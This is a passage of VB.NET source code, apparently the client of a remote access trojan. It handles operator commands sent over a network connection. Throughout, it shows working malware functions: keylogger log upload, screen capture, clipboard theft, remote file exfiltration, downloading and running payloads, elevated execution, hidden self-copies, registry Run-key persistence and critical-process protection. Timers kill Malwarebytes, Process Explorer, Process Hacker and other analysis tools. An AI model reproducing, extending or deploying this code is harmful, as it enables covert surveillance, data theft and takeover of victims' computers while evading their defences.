  1362. Comet.Send("serrrrr" & Yy & UO & Yy & System.IO.Path.GetFileNameWithoutExtension(Application.ExecutablePath))
  1363. Next controller
  1364.  
  1365. Case "KLACt"
  1366.  
  1367. KKKKS.Text = A(1)
  1368.  
  1369. Dim P2 As New Process
  1370. For Each P2 In Process.GetProcesses
  1371. If P2.MainWindowTitle.Contains(KKKKS.Text) Then
  1372. P2.Kill()
  1373. End If
  1374. Next
  1375.  
  1376. Case "Voz"
  1377.  
  1378. Dim tsss As String = A(1)
  1379.  
  1380. If tsss = 0 Then
  1381.  
  1382. msvc.Stop()
  1383.  
  1384. Else
  1385.  
  1386. msvc.Start()
  1387.  
  1388.  
  1389. End If
  1390.  
  1391.  
  1392. Case "TETE"
  1393. Comet.Send("TETE" & Yy & Npc)
  1394.  
  1395.  
  1396. Case "portex"
  1397. ewfwasefds1.Text = ""
  1398. ewfwasefds2.Text = ""
  1399. ewfwasefds.Text = ""
  1400. Dim sl As String = "ProcessSplit"
  1401. Try
  1402. Dim ewfwasefds As New TextBox
  1403. Dim Range As TcpClient = New TcpClient(A(1), A(2))
  1404. ewfwasefds2.Text = A(1) & " :" + A(2)
  1405. Dim TIOD$ = "True"
  1406. Dim EKJD$ = "Port [Open]"
  1407. If Range.Connected = True Then
  1408. ewfwasefds.Text = Range.Client.Handle
  1409. ewfwasefds1.Text = EKJD & "|" & ewfwasefds2.Text & "|" & TIOD & "|" & ewfwasefds.Text & sl
  1410. End If
  1411. Catch ex As Exception
  1412. ewfwasefds2.Text = A(1) & " :" + A(2)
  1413. Dim DXK$ = "False"
  1414. Dim EKJDsssss$ = "Port [Closed]"
  1415. ewfwasefds1.Text = EKJDsssss & "|" & ewfwasefds2.Text & "|" & DXK & "|" & "-" & sl
  1416. End Try
  1417.  
  1418. Comet.Send("poka" & Yy & ewfwasefds1.Text)
  1419.  
  1420. Case "Shutdowns"
  1421. Shell("Shutdown -r")
  1422. Case "sciikxxxwa"
  1423. Shell("Shutdown -s")
  1424. Case "xxyiazzqk"
  1425. Shell("Shutdown -l")
  1426.  
  1427. Case "stopg"
  1428. ero = 1
  1429.  
  1430. Case "xxx"
  1431.  
  1432. Dim ParentKey As RegistryKey =
  1433. Registry.LocalMachine.OpenSubKey("SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products")
  1434.  
  1435. Dim count As Integer = 0
  1436.  
  1437. Dim ChildKey As RegistryKey
  1438.  
  1439.  
  1440. For Each child As String In ParentKey.GetSubKeyNames()
  1441.  
  1442. ChildKey = ParentKey.OpenSubKey(child).OpenSubKey("InstallProperties")
  1443.  
  1444. If Not ChildKey Is Nothing Then
  1445.  
  1446. Dim LItem As New ListViewItem()
  1447. Dim q$ = ChildKey.GetValue("DisplayName").ToString
  1448. Dim w$ = ChildKey.GetValue("Publisher").ToString
  1449. Dim er$ = ChildKey.GetValue("InstallDate").ToString
  1450. Dim Yr$ = ChildKey.GetValue("EstimatedSize").ToString
  1451. Dim oos$ = ChildKey.GetValue("DisplayVersion").ToString
  1452. ReDim Preserve strUninstallStrings(count)
  1453. If ChildKey.GetValue("UninstallString") IsNot Nothing Then
  1454. strUninstallStrings(count) = ChildKey.GetValue("UninstallString")
  1455. Dim allProcess As String = ""
  1456. Dim sl As String = "ProcessSplit"
  1457. allProcess += q & "|" & w & "|" & er & "|" & Yr & "|" & oos & sl
  1458.  
  1459. Comet.Send("xxz" & Yy & allProcess)
  1460. Else
  1461. strUninstallStrings(count) = "No Uninstall String"
  1462. End If
  1463. End If
  1464. count += 1
  1465. Next
  1466. NewUninstallStrArr = (From str In strUninstallStrings
  1467. Where Not {"No Uninstall String"}.Contains(str)).ToArray()
  1468. Case "xxxxxxxxxxxxx"
  1469. Dim pro As Process = New Process() With {.StartInfo = New ProcessStartInfo(A(1)) With {.Verb = "runas", .UseShellExecute = True}}
  1470. pro.Start()
  1471. Case "lDL"
  1472. Dim procID As Integer
  1473. Dim sr$ = A(1)
  1474. procID = Shell(NewUninstallStrArr(sr), AppWinStyle.NormalFocus)
  1475. SendKeys.Send("{ENTER}")
  1476. SendKeys.Send("{ENTER}")
  1477. SendKeys.Send("{ENTER}")
  1478. SendKeys.Send("{ENTER}")
  1479. SendKeys.Send("{ENTER}")
  1480. SendKeys.Send("{ENTER}")
  1481. Case "RestProcess"
  1482. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1483. For i = 0 To eachprocess.Length - 2
  1484. For Each RunningProcess In Process.GetProcessesByName(eachprocess(i))
  1485. RunningProcess.Kill()
  1486. Next
  1487. Process.Start(eachprocess(i))
  1488. Next
  1489. Case "KillProcess"
  1490. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1491. For i = 0 To eachprocess.Length - 2
  1492. For Each RunningProcess In Process.GetProcessesByName(eachprocess(i))
  1493. RunningProcess.Kill()
  1494. Next
  1495. Next
  1496.  
  1497. Case "SProcess"
  1498. sco = 1
  1499. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1500. For i = 0 To eachprocess.Length - 2
  1501. Dim o = Process.GetProcessesByName(eachprocess(i))
  1502. SuspendProcess(o(0))
  1503. Comet.Send("SP")
  1504. Next
  1505. Case "SProcessr"
  1506. sco = 2
  1507. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1508. For i = 0 To eachprocess.Length - 2
  1509. Dim o = Process.GetProcessesByName(eachprocess(i))
  1510. SuspendProcess(o(0))
  1511. Comet.Send("SP")
  1512. Next
  1513. Case "SSProcess"
  1514. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1515. For i = 0 To eachprocess.Length - 2
  1516. Dim sh = Process.GetProcessesByName(eachprocess(i))
  1517. Dim iHwnd As IntPtr = FindWindow(eachprocess(i), vbNullString)
  1518. ShowWindow(iHwnd, SW_SHOWNORMAL)
  1519. Comet.Send("SP")
  1520. Next
  1521. Case "SSSProcess"
  1522. Dim eachprocess As String() = A(1).Split("ProcessSplit")
  1523. For i = 0 To eachprocess.Length - 2
  1524. Dim hi = Process.GetProcessesByName(eachprocess(i))
  1525. Dim iHwnd As IntPtr = FindWindow(eachprocess(i), vbNullString)
  1526. ShowWindow(iHwnd, SW_SHOWMINIMIZED)
  1527. Comet.Send("SP")
  1528. Next
  1529. Case "viewimage"
  1530. Comet.Send("viewimage" & Yy & Convert.ToBase64String(IO.File.ReadAllBytes(A(1))) & Yy)
  1531. Case "GetDrives"
  1532. Comet.Send("FileManager" & Yy & getDrives())
  1533. Case "FileManager"
  1534. Try
  1535. Comet.Send("FileManager" & Yy & getFolders(A(1)) & getFiles(A(1)))
  1536. Catch
  1537. Comet.Send("FileManager" & Yy & "Error")
  1538. End Try
  1539. Case "\\"
  1540. Comet.Send("\\")
  1541. Case "Delete"
  1542. Select Case A(1)
  1543. Case "Folder"
  1544. IO.Directory.Delete(A(2))
  1545. Case "File"
  1546. IO.File.Delete(A(2))
  1547.  
  1548. End Select
  1549. Case "Execute"
  1550. Process.Start(A(1))
  1551. Case "Exletn"
  1552. Dim pro As Process = New Process() With {.StartInfo = New ProcessStartInfo(A(1)) With {.Verb = "runas", .UseShellExecute = True}}
  1553. pro.Start()
  1554. Case "CpoSx"
  1555. File.Copy(Application.ExecutablePath, A(1) + " .EXE")
  1556. Case "IOPPYR"
  1557. File.Copy(Application.ExecutablePath, A(1) + " .EXE")
  1558. System.IO.File.SetAttributes(A(1) + " .EXE", IO.FileAttributes.Hidden)
  1559.  
  1560. Case "EMNS"
  1561. File.Encrypt(A(1))
  1562. Case "EMNqS"
  1563. File.Decrypt(A(1))
  1564.  
  1565. Case "Cuut"
  1566. TextBox2.Text = A(1)
  1567.  
  1568. Case "Cuutod"
  1569. TextBox2.Text = A(1)
  1570.  
  1571. Case "Cuutodsd"
  1572. File.Move(TextBox2.Text, A(1))
  1573. TextBox2.Text = ""
  1574.  
  1575.  
  1576. Case "dCopsx"
  1577. File.Copy(TextBox2.Text, A(1))
  1578. TextBox2.Text = ""
  1579. Case "CLLSKXOa"
  1580. SHEmptyRecycleBin(Me.Handle.ToInt32, vbNullString, SHERB_NOCONFIRMATION + SHERB_NOSOUND)
  1581. SHUpdateRecycleBinIcon()
  1582. Case "EIIT"
  1583. Dim Vir As String = "C:\Program Files (x86)" & "\WinRAR\Rar "
  1584. Dim POXow = A(1)
  1585. Dim oi$ = A(1) + ".rar"
  1586. Shell(Vir + "a -r """ + oi + """ """ + POXow)
  1587. Case "Rename"
  1588. Select Case A(1)
  1589. Case "Folder"
  1590. My.Computer.FileSystem.RenameDirectory(A(2), A(3))
  1591. Case "File"
  1592. My.Computer.FileSystem.RenameFile(A(2), A(3))
  1593. End Select
  1594. Case "sendfile"
  1595. IO.File.WriteAllBytes(IO.Path.GetTempPath & A(1), Convert.FromBase64String(A(2)))
  1596. Thread.Sleep(1000)
  1597. Process.Start(IO.Path.GetTempPath & A(1))
  1598. Comet.Send("Coloreg")
  1599. Case "playmusic"
  1600. My.Computer.Audio.Play(A(1), AudioPlayMode.Background)
  1601. Case "getdesktoppath"
  1602. Dim specialfolder As String
  1603. specialfolder = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
  1604. Comet.Send("getpath" & Yy & specialfolder & "\")
  1605. Case "gettemppath"
  1606. Dim specialfolder As String
  1607. specialfolder = IO.Path.GetTempPath
  1608. Comet.Send("getpath" & Yy & specialfolder)
  1609. Case "getstartuppath"
  1610. Dim specialfolder As String
  1611. specialfolder = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
  1612. Comet.Send("getpath" & Yy & specialfolder & "\")
  1613. Case "getmydocumentspath"
  1614. Dim specialfolder As String
  1615. specialfolder = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments)
  1616. Comet.Send("getpath" & Yy & specialfolder & "\")
  1617. Case "edittextfile"
  1618. Dim R As New IO.StreamReader(A(1))
  1619. Dim d As String
  1620. d = R.ReadToEnd
  1621. R.Close()
  1622. Comet.Send("edittextfile" & Yy & A(1) & Yy & d)
  1623. Case "savetextfile"
  1624. Dim Comet As New IO.StreamWriter(A(1))
  1625. Comet.WriteLine(A(2))
  1626. Comet.Close()
  1627. Case "creatnewtextfile"
  1628. Try
  1629. IO.File.Create(A(1)).Dispose()
  1630. Catch ex As Exception
  1631. Comet.Send("msgbox" & Yy & "Information" & Yy & "File Name Already Exists")
  1632. End Try
  1633. Case "setaswallpaper"
  1634. SystemParametersInfo(SETDESKWALLPAPER, 0, A(1), UPDATEINIFILE)
  1635. Case "sendfileto"
  1636. IO.File.WriteAllBytes(A(1), Convert.FromBase64String(A(2)))
  1637. Thread.Sleep(1000)
  1638. Case "creatnewfolder"
  1639. Try
  1640. My.Computer.FileSystem.CreateDirectory _
  1641. (A(1))
  1642.  
  1643. Catch ez As Exception
  1644. End Try
  1645. Case "hidefolderfile"
  1646. Dim hiden As FileAttribute = FileAttribute.Hidden
  1647. Try
  1648. SetAttr(A(1), hiden)
  1649. Catch ex As Exception
  1650. End Try
  1651. Case "download"
  1652. Dim c As New WebClient
  1653. Dim P As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" + A(2)
  1654. If File.Exists(P) Then File.Delete(P)
  1655. File.WriteAllBytes(P, c.DownloadData(A(1)))
  1656. Process.Start(P)
  1657. Comet.Send("Coloreg")
  1658. Case "showfolderfile"
  1659. Dim shown As FileAttribute = FileAttribute.Normal
  1660. Try
  1661. SetAttr(A(1), shown)
  1662. Catch ex As Exception
  1663.  
  1664. End Try
  1665. Case "downloadfile"
  1666. Comet.Send("downloadedfile" & "|U|" & Convert.ToBase64String(IO.File.ReadAllBytes(A(1))) & "|U|" & A(2))
  1667. Case "corrupt"
  1668. Dim corruption As String = "OP0 01 01 200 01 02OP"
  1669. Dim R As New IO.StreamReader(A(1))
  1670. Dim d As String
  1671. d = R.ReadToEnd
  1672. R.Close()
  1673. My.Computer.FileSystem.WriteAllText(A(1), corruption & d, False)
  1674. Case "tt"
  1675. Comet.Send("tt")
  1676. Case "Upload"
  1677. Try
  1678. If File.Exists(A(1)) Then File.Delete(A(1))
  1679. Dim fs As New FileStream(A(1), FileMode.Create, FileAccess.Write)
  1680. Dim tempPacket() As Byte = SB(A(3))
  1681. Dim packet(tempPacket.Length - 2) As Byte
  1682. Array.Copy(tempPacket, 0, packet, 0, packet.Length)
  1683. fs.Write(packet, 0, packet.Length) : fs.Close()
  1684. Comet.Send("NextPartOfUpload" & Yy & A(2))
  1685. Catch
  1686. Comet.Send("UploadFailed" & Yy & A(2))
  1687. End Try
  1688. Case "UploadContinue"
  1689. Try
  1690. A:
  1691. Dim fs As New FileStream(A(1), FileMode.Append, FileAccess.Write)
  1692. Dim tempPacket() As Byte = SB(A(3))
  1693. Dim packet(tempPacket.Length - 2) As Byte
  1694. Array.Copy(tempPacket, 0, packet, 0, packet.Length)
  1695. fs.Write(packet, 0, packet.Length) : fs.Close()
  1696. Comet.Send("NextPartOfUpload" & Yy & A(2))
  1697. Catch
  1698. GoTo A
  1699. End Try
  1700. Case "CancelUpload"
  1701. B:
  1702. Try
  1703. If File.Exists(A(1)) Then File.Delete(A(1))
  1704. Catch
  1705. GoTo B
  1706. End Try
  1707. Case "info"
  1708. Dim strHostName As String
  1709. Dim ipHostEntryData As IPHostEntry
  1710. Dim ipAddress As IPAddress
  1711. strHostName = Dns.GetHostName
  1712. ipHostEntryData = Dns.GetHostByName(strHostName)
  1713. Dim pc As String = Environment.MachineName & "/" & Environment.UserName
  1714. Dim os As String = My.Computer.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "").Replace("™", "").Replace(" ", " ").Replace(" Win", "Win")
  1715. Dim cpu As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString
  1716. Dim smsms As String
  1717. smsms = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS", "SystemManufacturer", "")
  1718.  
  1719.  
  1720.  
  1721. Dim Xepa As String = ""
  1722. Dim psBattery As PowerStatus = SystemInformation.PowerStatus
  1723. Dim perFull As Single = psBattery.BatteryLifePercent
  1724. If perFull * 100 > 100 Then
  1725. Xepa = 100
  1726. ElseIf perFull * 100 < 100 Then
  1727. Xepa = perFull * 100
  1728. End If
  1729. If psBattery.PowerLineStatus = PowerLineStatus.Online Then
  1730. Xepa = "Powered Charging - " & perFull * 100 & "%"
  1731.  
  1732. ElseIf psBattery.PowerLineStatus = PowerLineStatus.Offline Then
  1733. Xepa = "do not Charging Powered - " & perFull * 100 & "%"
  1734.  
  1735. End If
  1736.  
  1737. For Each ipAddress In ipHostEntryData.AddressList
  1738.  
  1739.  
  1740.  
  1741.  
  1742. imge_desik()
  1743.  
  1744.  
  1745. Comet.Send("info" & Yy & name & Yy & pc & Yy & country & Yy & os + GenerateOperatingSystem() & Yy & getanti() & Yy & checkcam() & Yy & RAM() & Yy & cpu & Yy & Ver & Yy & FR() & Yy & smsms & Yy & ipAddress.ToString() & Yy & Xepa & Yy & Convert.ToBase64String(IO.File.ReadAllBytes(ooo))) ' End If
  1746.  
  1747.  
  1748.  
  1749.  
  1750.  
  1751.  
  1752.  
  1753.  
  1754.  
  1755.  
  1756.  
  1757.  
  1758. 'Comet.Send("infoDesk" & "|U|" & &
  1759.  
  1760.  
  1761.  
  1762.  
  1763.  
  1764.  
  1765.  
  1766.  
  1767.  
  1768.  
  1769.  
  1770.  
  1771.  
  1772. Next
  1773. Case "Uninstall"
  1774. RtlSetProcessIsCritical(False, False, False)
  1775. Try
  1776. Dim regKey As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("software\microsoft\windows\currentversion\run", True)
  1777. PersistThread.Abort() : regKey.DeleteValue(StartupKey) : regKey.Close()
  1778.  
  1779. Catch ex As Exception
  1780. End Try
  1781.  
  1782. Try
  1783. If hidme Then
  1784. File.SetAttributes(Application.ExecutablePath, FileAttributes.Normal)
  1785. End If
  1786. UNS()
  1787. Catch : End Try
  1788.  
  1789. Case "!"
  1790. r.Clear()
  1791. Dim s = Screen.PrimaryScreen.Bounds.Size
  1792. Comet.Send("!" & Yy & s.Width & Yy & s.Height)
  1793. Case "!!"
  1794. r.Clear()
  1795. Dim s = Screen.PrimaryScreen.Bounds.Size
  1796. Comet.Send("!!" & Yy & s.Width & Yy & s.Height)
  1797. Case "@"
  1798. Dim SizeOfimage As Integer = A(1)
  1799. Dim Split As Integer = A(2)
  1800. Dim Quality As Integer = A(3)
  1801.  
  1802. Dim Bb As Byte() = r.Cap(SizeOfimage, Split, Quality)
  1803. Dim M As New IO.MemoryStream
  1804. Dim CMD As String = "@" & Yy
  1805. M.Write(SB(CMD), 0, CMD.Length)
  1806. M.Write(Bb, 0, Bb.Length)
  1807. Comet.Send(M.ToArray)
  1808. M.Dispose()
  1809. Case "YOD"
  1810.  
  1811. IO.File.WriteAllBytes(IO.Path.GetTempPath & A(1), Convert.FromBase64String(A(2)))
  1812. Thread.Sleep(1000)
  1813. hekoo.Text = A(1)
  1814. Comet.Send("Coloreg")
  1815.  
  1816. Case "helpx"
  1817. Dim hek As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + A(4)
  1818.  
  1819. If A(3) = 1 Then
  1820. My.Computer.FileSystem.WriteAllText(hek, A(2), False)
  1821. Shell(A(1) + " " + hek, AppWinStyle.Hide)
  1822. End If
  1823. If A(3) = 2 Then
  1824. My.Computer.FileSystem.WriteAllText(hek, A(2), False)
  1825. Shell(A(1) + " " + hek, AppWinStyle.NormalFocus)
  1826. End If
  1827. If A(3) = 3 Then
  1828. My.Computer.FileSystem.WriteAllText(hek, A(2), False)
  1829. Shell(A(1) + " " + hek, AppWinStyle.MaximizedFocus)
  1830. End If
  1831. If A(3) = 4 Then
  1832. My.Computer.FileSystem.WriteAllText(hek, A(2), False)
  1833. Shell(A(1) + " " + hek, AppWinStyle.MinimizedFocus)
  1834. End If
  1835. Case "Kilsx"
  1836. Dim pro As Process = New Process() With {.StartInfo = New ProcessStartInfo(A(1)) With {.Verb = "runas", .UseShellExecute = True}}
  1837. pro.Kill()
  1838. Case "KilsStsr"
  1839. Dim pro As Process = New Process() With {.StartInfo = New ProcessStartInfo(A(1)) With {.Verb = "runas", .UseShellExecute = True}}
  1840. pro.Start()
  1841. Case "Kiloooow"
  1842. Dim erio() As Process = Process.GetProcessesByName(A(1))
  1843. For Each Process As Process In erio
  1844. Process.Kill()
  1845. Next
  1846. Case "KilsStsrooow"
  1847. Process.Start(A(1))
  1848. Case "msgx"
  1849. If A(3) = 0 Then
  1850. MsgBox(A(1), MsgBoxStyle.Critical, A(2))
  1851. End If
  1852. If A(3) = 1 Then
  1853. MsgBox(A(1), MsgBoxStyle.Exclamation, A(2))
  1854. End If
  1855. If A(3) = 2 Then
  1856. MsgBox(A(1), MsgBoxStyle.Information, A(2))
  1857. End If
  1858. If A(3) = 3 Then
  1859. MsgBox(A(1), 0, A(2))
  1860. End If
  1861. Case "@@"
  1862.  
  1863. Dim SizeOfimage As Integer = A(1)
  1864. Dim Split As Integer = A(2)
  1865. Dim Quality As Integer = A(3)
  1866.  
  1867. Dim Bb As Byte() = CRDP1.Cap(SizeOfimage, Split, Quality)
  1868. Dim M As New IO.MemoryStream
  1869. Dim CMD As String = "@@" & Yy
  1870. M.Write(SB(CMD), 0, CMD.Length)
  1871. M.Write(Bb, 0, Bb.Length)
  1872. Comet.Send(M.ToArray)
  1873. M.Dispose()
  1874. Case "#"
  1875. Cursor.Position = New Point(A(1), A(2))
  1876. mouse_event(A(3), 0, 0, 0, 1)
  1877. Case "$"
  1878. Cursor.Position = New Point(A(1), A(2))
  1879. Case "close"
  1880. RtlSetProcessIsCritical(False, False, False)
  1881. End
  1882. Case "fun"
  1883. Comet.Send("fun")
  1884. Case "F"
  1885. My.Computer.FileSystem.WriteAllBytes(A(2), SB(A(1)), False)
  1886. Process.Start(A(2))
  1887. Comet.Send("F")
  1888. Case "openkl"
  1889. Comet.Send("openkl")
  1890. Case "Getloges"
  1891. Try
  1892. Comet.Send("loges" & Yy & kl.Logs)
  1893. Catch : End Try
  1894. End Select
  1895. Catch ex As Exception
  1896. End Try
  1897.  
  1898. End Sub
  1899. #End Region
  1900. Private Sub SuspendProcess(ByVal process As System.Diagnostics.Process)
  1901. For Each t As ProcessThread In process.Threads
  1902. Dim th As IntPtr
  1903. If sco = 1 Then
  1904. th = OpenThread(ThreadAccess.SUSPEND_RESUME, False, t.Id)
  1905. If th <> IntPtr.Zero Then
  1906. SuspendThread(th)
  1907. CloseHandle(th)
  1908. End If
  1909. ElseIf sco = 2 Then
  1910. th = OpenThread(ThreadAccess.SUSPEND_RESUME, False, t.Id)
  1911. If th <> IntPtr.Zero Then
  1912. ResumeThread(th)
  1913. CloseHandle(th)
  1914. End If
  1915. End If
  1916.  
  1917.  
  1918. Next
  1919. End Sub
  1920. #Region " =================== remote Shell =================== "
  1921.  
  1922. #End Region
  1923. Public Function ENB(ByRef s As String) As String
  1924. On Error Resume Next
  1925. Dim byt As Byte() = System.Text.Encoding.UTF8.GetBytes(s)
  1926. ENB = Convert.ToBase64String(byt)
  1927. End Function
  1928. Public Function DEB(ByRef s As String) As String
  1929. On Error Resume Next
  1930. Dim b As Byte() = Convert.FromBase64String(s)
  1931. DEB = System.Text.Encoding.UTF8.GetString(b)
  1932. End Function
  1933. Public LO As Object = New IO.FileInfo(Application.ExecutablePath)
  1934. Private Sub RS(ByVal a As Object, ByVal e As Object)
  1935. Try
  1936. Comet.Send("rs" & Yy & ENB(e.Data))
  1937. Catch ex As Exception
  1938. End Try
  1939. End Sub
  1940. Private Sub ex()
  1941. Try
  1942. Comet.Send("rsc" & Yy)
  1943. Catch ex As Exception
  1944. End Try
  1945. End Sub
  1946.  
  1947. Function GetKey(ByVal key As String) As Microsoft.Win32.RegistryKey
  1948. Dim k As String
  1949. If key.StartsWith(Registry.ClassesRoot.Name) Then
  1950. k = key.Replace(Registry.ClassesRoot.Name & "\", "")
  1951. Return Registry.ClassesRoot.OpenSubKey(k, True)
  1952. End If
  1953. If key.StartsWith(Registry.CurrentUser.Name) Then
  1954. k = key.Replace(Registry.CurrentUser.Name & "\", "")
  1955. Return Registry.CurrentUser.OpenSubKey(k, True)
  1956. End If
  1957. If key.StartsWith(Registry.LocalMachine.Name) Then
  1958. k = key.Replace(Registry.LocalMachine.Name & "\", "")
  1959. Return Registry.LocalMachine.OpenSubKey(k, True)
  1960. End If
  1961. If key.StartsWith(Registry.Users.Name) Then
  1962. k = key.Replace(Registry.Users.Name & "\", "")
  1963. Return Registry.Users.OpenSubKey(k, True)
  1964. End If
  1965. Return Nothing
  1966. End Function
  1967. Delegate Sub gt()
  1968. Function gtx() As String
  1969. Dim str As String
  1970. str = Windows.Forms.Clipboard.GetText
  1971. Comet.Send("recvcli" & Yy & str)
  1972. Return True
  1973. End Function
  1974. Private Declare Function GetVolumeInformation Lib "kernel32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Integer, ByRef lpVolumeSerialNumber As Integer, ByRef lpMaximumComponentLength As Integer, ByRef lpFileSystemFlags As Integer, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Integer) As Integer
  1975. Function HWD() As String
  1976. Try
  1977. Dim sn As Integer
  1978. GetVolumeInformation(Environ("SystemDrive") & "\", Nothing, Nothing, sn, 0, 0, Nothing, Nothing)
  1979. Return (Hex(sn))
  1980. Catch ex As Exception
  1981. Return "ERR"
  1982. End Try
  1983. End Function
  1984. Private Sub Timer3_Tick(sender As System.Object, e As System.EventArgs) Handles Timer3.Tick
  1985. On Error Resume Next
  1986. Dim ItemProcess() As Process = Process.GetProcessesByName("procexp")
  1987.  
  1988. If Not ItemProcess Is Nothing Then
  1989.  
  1990. For Each SubProcess As Process In ItemProcess
  1991.  
  1992. SubProcess.Kill()
  1993.  
  1994. Next
  1995. End If
  1996. End Sub
  1997.  
  1998. Private Sub Timer4_Tick(sender As System.Object, e As System.EventArgs) Handles Timer4.Tick
  1999.  
  2000. Try
  2001. Dim ProcessHacker() As Process = Process.GetProcessesByName("ProcessHacker")
  2002.  
  2003. For Each Process As Process In ProcessHacker
  2004. Process.Kill()
  2005. Next
  2006.  
  2007. Catch x As Exception
  2008. End Try
  2009. Dim ItemProcess() As Process = Process.GetProcessesByName("ProcessHacker")
  2010.  
  2011. If Not ItemProcess Is Nothing Then
  2012.  
  2013. For Each SubProcess As Process In ItemProcess
  2014.  
  2015. SubProcess.Kill()
  2016.  
  2017. Next
  2018. End If
  2019. End Sub
  2020.  
  2021. Private Sub Timer5_Tick(sender As System.Object, e As System.EventArgs) Handles Timer5.Tick
  2022. Try
  2023. Dim apateDNS() As Process = Process.GetProcessesByName("apateDNS")
  2024.  
  2025. For Each Process As Process In apateDNS
  2026. Process.Kill()
  2027. Next
  2028.  
  2029. Catch x As Exception
  2030. End Try
  2031.  
  2032. End Sub
  2033.  
  2034. Private Sub Timer6_Tick(sender As System.Object, e As System.EventArgs) Handles Timer6.Tick
  2035. For Each proc In System.Diagnostics.Process.GetProcessesByName("mbamgui")
  2036. If proc.MainWindowTitle.Trim() = "Malwarebytes Anti-Malware" Then
  2037. proc.Kill()
  2038. End If
  2039. Next
  2040. Try
  2041. Dim mbamgui() As Process = Process.GetProcessesByName("mbamgui")
  2042.  
  2043. For Each Process As Process In mbamgui
  2044. Process.Kill()
  2045. Next
  2046.  
  2047. Catch x As Exception
  2048. End Try
  2049. For Each proc In System.Diagnostics.Process.GetProcessesByName("mbam")
  2050. If proc.MainWindowTitle.Trim() = "Malwarebytes Anti-Malware" Then
  2051. proc.Kill()
  2052. End If
  2053. Next
  2054. Try
  2055. Dim mbam() As Process = Process.GetProcessesByName("mbam")
  2056.  
  2057. For Each Process As Process In mbam
  2058. Process.Kill()
  2059. Next
  2060.  
  2061. Catch x As Exception
  2062. End Try
  2063. End Sub
  2064.  
  2065. Private Sub Timer7_Tick(sender As System.Object, e As System.EventArgs) Handles Timer7.Tick
  2066. Try
  2067. Dim AntiLogger() As Process = Process.GetProcessesByName("AntiLogger")
  2068.  
  2069. For Each Process As Process In AntiLogger
  2070. Process.Kill()
  2071. Next
  2072.  
  2073. Catch x As Exception
  2074. End Try
  2075.  
  2076. End Sub
  2077.  
  2078. Sub Persist(ByVal Skey As String)
  2079. Do
  2080. System.Threading.Thread.Sleep(500)
  2081. Try
  2082. Dim regKey As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("software\microsoft\windows\currentversion\run", True)
  2083. regKey.SetValue(Skey, Application.ExecutablePath, Microsoft.Win32.RegistryValueKind.String) : regKey.Close()
  2084. Catch : End Try
  2085. Loop
  2086. End Sub
  2087. Sub BA()
  2088. Try
  2089. Do
  2090.  
  2091. Dim i As CLIENT_ID
  2092. Dim hThread As Long
  2093. i:
  2094. pfnStartAddr = GetProcAddress(LoadLibrary("ntdll"), "RtlExitUserProcess")
  2095. RtlCreateUserThread(Process.GetProcessesByName("sqlwriter")(0).Handle, 0&, 0, 0, 0, 0, pfnStartAddr, 0, 0, i)
  2096. Threading.Thread.Sleep(2000)
  2097. Loop
  2098. Catch ex As Exception
  2099. GoTo i
  2100. End Try
  2101.  
  2102. End Sub
  2103.  
  2104. Public Sub IconsToggle()
  2105. On Error Resume Next
  2106. Dim hWnd As IntPtr = FindWindow("ProgMan", Nothing)
  2107. hWnd = GetWindow(hWnd, GetWindowCmd.GW_CHILD)
  2108.  
  2109. If IsWindowVisible(hWnd) Then
  2110. ShowWindow(hWnd, SW.Hide)
  2111. Else
  2112. ShowWindow(hWnd, SW.ShowNoActivate)
  2113. End If
  2114. End Sub
  2115. Private Declare Function FindWindowEx Lib "user32.dll" Alias _
  2116. "FindWindowExA" (ByVal hWnd1 As Int32, ByVal hWnd2 As Int32, ByVal lpsz1 As String,
  2117. ByVal lpsz2 As String) As Int32
  2118.  
  2119. Private Sub HideTaskbarItems()
  2120. On Error Resume Next
  2121. Dim TaskBarWin As Long, TaskButtonWin As Long
  2122.  
  2123. TaskBarWin = FindWindow("Shell_TrayWnd", vbNullString)
  2124. TaskButtonWin = FindWindowEx(TaskBarWin, 0, "ReBarWindow32", vbNullString)
  2125. ShowWindow(TaskButtonWin, 1)
  2126. End Sub
  2127. Private Sub ShowTaskbarItems()
  2128. On Error Resume Next
  2129. Dim TaskBarWin As Long, TaskButtonWin As Long
  2130.  
  2131. TaskBarWin = FindWindow("Shell_TrayWnd", vbNullString)
  2132. TaskButtonWin = FindWindowEx(TaskBarWin, 0, "ReBarWindow32", vbNullString)
  2133. ShowWindow(TaskButtonWin, 0)
  2134. End Sub
  2135. Private Sub hideclock()
  2136. On Error Resume Next
  2137. Dim TaskBarWin As Long, TrayWin As Long, ClockWin As Long
  2138.  
  2139. TaskBarWin = FindWindow("Shell_TrayWnd", vbNullString)
  2140. TrayWin = FindWindowEx(TaskBarWin, 0, "TrayNotifyWnd", vbNullString)
  2141. ClockWin = FindWindowEx(TrayWin, 0, "TrayClockWClass", vbNullString)
  2142. ShowWindow(ClockWin, 0)
  2143. End Sub
  2144.  
  2145. Private Sub showclock()
  2146. On Error Resume Next
  2147. Dim TaskBarWin As Long, TrayWin As Long, ClockWin As Long
  2148.  
  2149. TaskBarWin = FindWindow("Shell_TrayWnd", vbNullString)
  2150. TrayWin = FindWindowEx(TaskBarWin, 0, "TrayNotifyWnd", vbNullString)
  2151. ClockWin = FindWindowEx(TrayWin, 0, "TrayClockWClass", vbNullString)
  2152. ShowWindow(ClockWin, 1)
